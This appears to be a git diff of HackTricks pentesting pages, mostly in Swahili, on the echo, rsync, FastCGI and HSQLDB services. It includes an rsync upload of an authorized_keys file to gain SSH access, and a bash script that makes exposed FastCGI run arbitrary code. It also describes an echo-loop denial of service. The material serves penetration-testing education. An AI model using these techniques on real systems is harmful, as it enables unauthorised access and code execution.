* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

50
network-services-pentesting/7-tcp-udp-pentesting-echo.md
View file

@ -1,18 +1,19 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -21,13 +22,13 @@ Njia nyingine za kusaidia HackTricks:
***
# Taarifa Msingi
# Basic Information
Kuna huduma ya kielekezi inayofanya kazi kwenye mwenyeji huyu. Huduma ya kielekezi ilikusudiwa kwa ajili ya majaribio na kupima na inaweza kusikiliza kwenye itifaki za TCP na UDP. Mfumo hutoa nyuma data yoyote inayopokea, bila kuihariri.\
**Inawezekana kusababisha kukataliwa kwa huduma kwa kuunganisha huduma ya kielekezi kwenye huduma ya kielekezi kwenye mashine hiyo hiyo au nyingine**. Kwa sababu ya idadi kubwa sana ya pakiti zinazozalishwa, mashine zilizoathiriwa zinaweza kuondolewa kwa ufanisi kutoka kwenye huduma.\
Maelezo kutoka [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)
Huduma ya echo inafanya kazi kwenye mwenyeji huu. Huduma ya echo ilikusudiwa kwa ajili ya majaribio na vipimo na inaweza kusikiliza kwenye itifaki za TCP na UDP. Server inarudisha data yoyote inayopokea, bila mabadiliko.\
**Inawezekana kusababisha kukatizwa kwa huduma kwa kuunganisha huduma ya echo kwenye huduma ya echo kwenye mashine moja au nyingine**. Kwa sababu ya idadi kubwa sana ya pakiti zinazozalishwa, mashine zilizoathirika zinaweza kutolewa kwa ufanisi kutoka kwenye huduma.\
Taarifa kutoka [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)
**Bandari ya Default:** 7/tcp/udp
**Default Port:** 7/tcp/udp
```
PORT STATE SERVICE
7/udp open echo
@ -43,29 +44,30 @@ Hello echo #This is the response
* `port:7 echo`
## Marejeo
## References
[Wikipedia echo](http://en.wikipedia.org/wiki/ECHO\_protocol)
[CA-1996-01 UDP Port Denial-of-Service Attack](http://www.cert.org/advisories/CA-1996-01.html)
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

87
network-services-pentesting/873-pentesting-rsync.md
View file

@ -1,55 +1,34 @@
# 873 - Pentesting Rsync
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Maelezo Muhimu**
## **Basic Information**
Kutoka [wikipedia](https://en.wikipedia.org/wiki/Rsync):
From [wikipedia](https://en.wikipedia.org/wiki/Rsync):
> **rsync** ni programu inayotumika kwa ufanisi katika [kuhamisha](https://en.wikipedia.org/wiki/File\_transfer) na [kusawazisha](https://en.wikipedia.org/wiki/File\_synchronization) [faili](https://en.wikipedia.org/wiki/Computer\_file) kati ya kompyuta na diski ngumu ya nje na kati ya [kompyuta](https://en.wikipedia.org/wiki/Computer) zilizounganishwa kwenye [mtandao](https://en.wikipedia.org/wiki/Computer\_network) kwa kulinganisha nyakati za [ubadilishaji](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) na ukubwa wa faili.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Mara nyingi hupatikana kwenye [mfumo wa uendeshaji](https://en.wikipedia.org/wiki/Operating\_system) kama vile Unix. Algorithm ya rsync ni aina ya [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), na hutumiwa kupunguza matumizi ya mtandao. [Zlib](https://en.wikipedia.org/wiki/Zlib) inaweza kutumika kwa [kupunguza data](https://en.wikipedia.org/wiki/Data\_compression) ziada,[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) na [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) au [stunnel](https://en.wikipedia.org/wiki/Stunnel) inaweza kutumika kwa usalama.
> **rsync** ni chombo cha kuhamasisha [kuhamasisha](https://en.wikipedia.org/wiki/File\_transfer) na [kuunganisha](https://en.wikipedia.org/wiki/File\_synchronization) [faili](https://en.wikipedia.org/wiki/Computer\_file) kati ya kompyuta na diski ngumu ya nje na kati ya [kompyuta](https://en.wikipedia.org/wiki/Computer) zilizounganishwa [mtandao](https://en.wikipedia.org/wiki/Computer\_network) kwa kulinganisha [nyakati za mabadiliko](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) na ukubwa wa faili.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Inapatikana mara nyingi kwenye [sistimu za uendeshaji](https://en.wikipedia.org/wiki/Operating\_system) zinazofanana na [Unix](https://en.wikipedia.org/wiki/Unix-like). Algorithimu ya rsync ni aina ya [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), na inatumika kupunguza matumizi ya mtandao. [Zlib](https://en.wikipedia.org/wiki/Zlib) inaweza kutumika kwa [kuongeza](https://en.wikipedia.org/wiki/Data\_compression) [kushinikiza data](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) na [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) au [stunnel](https://en.wikipedia.org/wiki/Stunnel) zinaweza kutumika kwa usalama.
**Bandari ya chaguo-msingi:** 873
**Default port:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
### Uchambuzi
## Enumeration
### Bango na Mawasiliano ya Mwongozo
Kabla ya kuanza kuchunguza huduma ya rsync, ni muhimu kufanya uchambuzi wa awali ili kupata habari muhimu. Kuna njia mbili za kufanya hivyo: kuchunguza bango na kuwasiliana kwa mwongozo.
#### Kuchunguza Bango
Kuchunguza bango kunahusisha kupata habari kutoka kwa bango la huduma ya rsync. Unaweza kutumia amri ya `telnet` au zana kama `nmap` kufanya hivyo. Kwa mfano, unaweza kutumia amri ifuatayo:
```plaintext
telnet <IP> 873
```
Ikiwa unapata majibu kutoka kwa seva ya rsync, unaweza kusoma habari muhimu kama toleo la huduma na maelezo mengine yanayoweza kuwa na manufaa.
#### Kuwasiliana kwa Mwongozo
Kuwasiliana kwa mwongozo kunahusisha kujaribu kuunganisha na seva ya rsync kwa kutumia amri ya `rsync` na kuchunguza majibu yake. Unaweza kutumia amri ifuatayo:
```plaintext
rsync rsync://<IP>:873
```
Ikiwa unapata majibu kutoka kwa seva ya rsync, unaweza kusoma habari muhimu kama toleo la huduma na maelezo mengine yanayoweza kuwa na manufaa.
### Banner & Mawasiliano ya Kiganja
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@ -71,9 +50,9 @@ nc -vn 127.0.0.1 873
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
### **Kutambaza Folda Zilizoshirikiwa**
### **Kuhesabu Folda Zinazoshirikiwa**
**Moduli za Rsync** hutambuliwa kama **kushiriki folda** ambazo zinaweza kuwa **zimekingwa na nywila**. Ili kutambua moduli zilizopo na kuangalia kama zinahitaji nywila, tumia amri zifuatazo:
**Moduli za Rsync** zinatambulika kama **ushirikiano wa directory** ambao unaweza kuwa **na nywila**. Ili kubaini moduli zinazopatikana na kuangalia kama zinahitaji nywila, amri zifuatazo zinatumika:
```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
@ -81,13 +60,13 @@ msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
Kuwa makini kwamba baadhi ya hisa huenda zisionekane kwenye orodha, huenda zikifichwa. Aidha, kupata baadhi ya hisa kunaweza kuwa na kikwazo cha **vitambulisho** maalum, kama inavyoonyeshwa na ujumbe wa **"Access Denied"**.
Kumbuka kwamba baadhi ya sehemu zinaweza kutokuwepo kwenye orodha, huenda zikifichwa. Aidha, kufikia baadhi ya sehemu kunaweza kuwa na vizuizi kwa **credentials** maalum, vinavyoonyeshwa na ujumbe wa **"Access Denied"**.
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync)
### Matumizi ya Rsync kwa Mikono
### Matumizi ya Manual Rsync
Baada ya kupata orodha ya **moduli**, hatua zinategemea kama uwakilishi unahitaji uwakilishaji. Bila uwakilishaji, **kuorodhesha** na **kukopi** faili kutoka kwenye folda iliyoshirikiwa kwenda kwenye saraka ya ndani inafanikiwa kupitia:
Baada ya kupata **module list**, hatua zinategemea kama uthibitisho unahitajika. Bila uthibitisho, **kuorodhesha** na **kunakili** faili kutoka kwa folda iliyoshirikiwa hadi directory ya ndani inafanywa kupitia:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
@ -95,14 +74,14 @@ rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
Mchakato huu **unaendeleza faili kwa njia ya kurejesha**, ukilinda sifa na ruhusa zake.
Hii mchakato **huhamasisha faili kwa njia ya kurudi**, ikihifadhi sifa na ruhusa zao.
Kwa **vitambulisho**, orodha na kupakua kutoka kwenye folda iliyoshirikiwa inaweza kufanywa kama ifuatavyo, ambapo itaonekana ombi la nenosiri:
Kwa **vithibitisho**, orodha na kupakua kutoka kwa folda iliyopewa inaweza kufanywa kama ifuatavyo, ambapo dirisha la nenosiri litajitokeza:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
Kutuma **maudhui**, kama faili ya _**authorized_keys**_ kwa ajili ya ufikiaji, tumia:
Ili **kupakia maudhui**, kama faili ya _**authorized_keys**_ kwa ufikiaji, tumia:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
@ -112,22 +91,22 @@ Ili kupata faili ya usanidi ya rsyncd, tekeleza:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
Ndani ya faili hii, parameteri ya _secrets file_ inaweza kuashiria faili inayohifadhi **majina ya watumiaji na nywila** kwa ajili ya uwakiki wa rsyncd.
Katika faili hii, parameter ya _secrets file_ inaweza kuelekeza kwenye faili inayoshikilia **majina ya watumiaji na nywila** za uthibitishaji wa rsyncd.
## Marejeo
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

42
network-services-pentesting/9000-pentesting-fastcgi.md
View file

@ -1,19 +1,20 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Ikiwa unataka **kujifunza ni nini FastCGI** angalia ukurasa ufuatao:
@ -21,11 +22,11 @@ Ikiwa unataka **kujifunza ni nini FastCGI** angalia ukurasa ufuatao:
[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
{% endcontent-ref %}
Kwa chaguo-msingi **FastCGI** inaendesha kwenye **bandari** **9000** na haikubaliki na nmap. **Kawaida** FastCGI inasikiliza tu kwenye **localhost**.
Kwa kawaida **FastCGI** inafanya kazi kwenye **bandari** **9000** na haitambuliwi na nmap. **Kawaida** FastCGI inasikiliza tu kwenye **localhost**.
# RCE
Ni rahisi sana kufanya FastCGI itekeleze nambari za kupindukia:
Ni rahisi sana kufanya FastCGI kutekeleza msimbo wowote:
```bash
#!/bin/bash
@ -45,19 +46,20 @@ cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
```
Au unaweza kutumia script ya Python ifuatayo: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
au unaweza pia kutumia skripti ifuatayo ya python: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

94
network-services-pentesting/9001-pentesting-hsqldb.md
View file

@ -1,104 +1,96 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** ni mfumo wa hifadhidata ya uhusiano wa SQL unaongoza ulioandikwa kwa Java. Inatoa injini ndogo, haraka yenye uwezo wa kushughulikia nyuzi nyingi na hifadhidata ya shughuli na meza za kumbukumbu na kumbukumbu ya diski na inasaidia njia za kujumuisha na seva.
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** ni mfumo mkuu wa hifadhidata ya SQL inayohusiana iliyoandikwa kwa Java. Inatoa injini ndogo, ya haraka ya hifadhidata yenye nyuzi nyingi na ya muamala yenye meza za ndani na za diski na inasaidia hali za embedded na server.
**Bandari ya chaguo-msingi:** 9001
**Default port:** 9001
```text
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# Taarifa
# Information
### Mipangilio ya Awali
### Default Settings
